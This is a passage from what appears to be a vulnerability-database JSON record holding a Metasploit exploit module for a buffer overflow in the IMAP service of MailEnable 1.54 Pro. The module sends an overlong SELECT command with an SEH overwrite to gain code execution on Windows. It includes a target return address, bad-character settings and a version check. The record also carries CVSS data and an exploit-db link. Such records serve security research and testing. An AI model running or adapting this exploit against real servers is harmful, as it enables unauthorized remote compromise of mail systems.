'OSVDB', '19842'],\r\n\t\t\t\t\t[ 'BID', '15006'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 03 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\r\n\t\tif (banner and banner =~ /MailEnable Service, Version: 0-1\\.54/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_login\r\n\r\n\t\tbuf = rand_text_alphanumeric(6196, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\treq = 'a01 SELECT ' + buf + seh + \"\\r\\n\"\r\n\t\tsock.put(req)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16480/"}]}
